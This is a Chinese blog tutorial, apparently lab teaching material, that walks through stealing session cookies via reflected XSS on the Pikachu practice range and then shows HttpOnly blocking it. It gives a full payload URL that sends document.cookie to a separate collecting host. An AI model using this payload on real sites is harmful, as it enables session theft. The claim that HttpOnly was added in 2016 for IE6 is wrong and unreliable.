目录

环境搭建

盗取cookie

httponly


刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。

环境搭建

  • 存在漏洞的网站:pikachu靶场
  • 接收cookie的网站:pikachu靶场中的管理工具xss后台

可以在两个服务器上同时开启pikachu靶场,一个测试漏洞,一个接收cookie

1. 修改pikachu-master\pkxss\xcookie\cookie.php文件

设置获取cookie后重定向的网站地址,这里就直接跳转到pikachu靶场的

2. 登录管理工具xss后台

盗取cookie

1. 测试是否能获取到cookie

如下我们可以知道当前页面是存在cookie的,通过document.cookie成功获取到了

2. 盗取cookie

因为页面存在xss漏洞,可以进行弹窗操作,既然能弹窗说明能执行js语句,那么在特定条件我们通过执行js语句可以获取cookie值。

受害者在未退出登录的情况下不小心点击了恶意链接,如下

192.168.189.129/2_Shotting_Range/pikachu-master/vul/xss/xss_reflected_get.php?message=<script>document.location = http://192.168.189.128/2_Shotting_Range/pikachu-master/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>&submit=submit

红色字体就是存在xss漏洞的位置,我们在这里放入获取cookie的payload。payload意思就是访问189.128页面并且携带cookie将cookie存储到指定页面中

然后点击访问,页面进行了跳转,跳转到hacker的服务器上

2. 查看是否获取到cookie

如下成功获取到信息

httponly

HttpOnly是2016年微软为IE6而新增了这一属性,HttpOnly是包含在http返回头Set-Cookie里面的一个附加的flag,所以它是后端服务器对cookie设置的一个附加的属性,在生成cookie时使用HttpOnly标志有助于减轻客户端脚本访问受保护cookie的风险。

也就是说HttpOnly存在主要是为了防止用户通过前端js来盗用cookie而产生的风险,例如XSS攻击就是对cookie进行盗窃,使用这一属性就可以防止通过js脚本读取到cookie信息,预防XSS攻击,窃取cookie内容

如下,在set-cookie没有设置httponly的情况下,通过document.cookie是可以获取到cookie值的

然后设置httponly

正确登录后,返回含有httponly的cookie值

然后再通过document.cookie,此时则获取不到cookie值了

XSS漏洞利用之cookie获取相关推荐

  1. xss漏洞利用方式总结

    目录 搭建XSS平台 窃取cookie 抓取屏幕截图 重定向 植入广告 恶意链接 获取键盘记录 网页钓鱼 网页挂马 搭建XSS平台 首先,我们需要一个XSS平台,自己搭建一个还是使用在线的都可以,本人 ...

  2. 【XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF

    目录 1 案例简介 1.1 案例目的 1.2 案例环境 2 案例一:浏览器劫持 2.1 概述 2.2 案例步骤 3 案例二:会话劫持 3.1 概述 3.2 案例步骤 4 案例三:GetShell 4. ...

  3. 【XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell)

    目录 1 实验简介 1.1 实验目的 1.2 实验环境 2 实验一:浏览器劫持 2.1 概述 2.2 实验步骤 3 实验二:会话劫持 3.1 概述 3.2 实验步骤 4 实验三:GetShell 4. ...

  4. XSS漏洞利用---PHPMyWind 任意密码重置漏洞

    [漏洞详情] 1.PHPMyWind是一套基于PHP和MySQL并符合W3C标准的企业网站建设解决方案,拥有着较大的用户群体(根据PHPMyWind官网介绍,已下载超15万次),受影响的版本是5.3- ...

  5. XSS漏洞利用——键盘记录

    实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一.在服务器创建一个keylog.php文件 ...

  6. Dreammail V4.6.9.2 XSS漏洞利用

    转载请注明:@小五义http://www.cnblogs.com/xiaowuyi 针对版本: DreamMail 4.6.9.2 测试环境:windows xp sp3 python版本:2.6 测 ...

  7. 搭建HTTPS XSS漏洞利用平台

    目录 功能: 升级方式:

  8. web漏洞利用---XSS注入攻击

    XSS漏洞简介 XSS注入漏洞又称为"跨站脚本攻击(Cross Site Scripting)",为了不和层叠样式表(Cascading Style Sheets,CSS)混淆,所 ...

  9. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

最新文章

  1. 小龙虾上天了!口碑APP推出飞机上扫码点餐服务
  2. 【论文解读】CVPR 2021 当之无愧的最佳论文奖:GIRAFFE,一种可控图像合成方法...
  3. linux shell的单行多行注释
  4. android项目编译命令行,命令行编译Android项目
  5. javascript面向对象5
  6. windows桌面待办事项_想拒绝拖延症?你还缺一款云同步提醒的的桌面便签软件!...
  7. linux 已有目录挂载磁盘
  8. 六下计算机教学总结,六年级信息技术教师教学工作总结
  9. ZIGBEE协议栈如何低功耗(CC2530+ZIGBEE2.5)
  10. 为什么有些蓝牙耳机有底噪?高音质便宜实惠的蓝牙耳机分享
  11. 台式计算机硬盘的安装位置,台式电脑分别如何安装SSD(固态硬盘)详细图文教程...
  12. 全栈式python工程师培训课程
  13. Linux系统下制作windows系统安装U盘
  14. IDEA的快捷键与qq的冲突了怎么办
  15. Linux--用xmanager远程管理的设定过程
  16. 不安全!!!都2020年了,你的网站还没上HTPPS说得过去吗?
  17. SkeyePlayer源码解析系列之支持H265
  18. C1实训-动态令牌(二次验证码)原理及实现
  19. MySQL廖雪峰的官方网站
  20. 免费顺丰快递鸟单号查询不限次数api接口申请步骤

热门文章

  1. 回顾+纪念:离开帝都的第一年(转)
  2. 广东移动:各技术岗简介——FML
  3. 我在深圳,每月收入850元,怎么也花不完,晒一晒我是怎么开销和投资的(zz)
  4. Linux战地日记—shell脚本的建立与执行
  5. GBase 8c V3.0.0数据类型——货币类型
  6. gaxlxy nexus遭遇不断重启
  7. 用openCV实现形态学操作
  8. Qt学习笔记(Qt制作菜单栏and工具栏and状态栏)^_^
  9. currentStyle和getComputedStyle的区别
  10. echarts折线图小圆点去除方式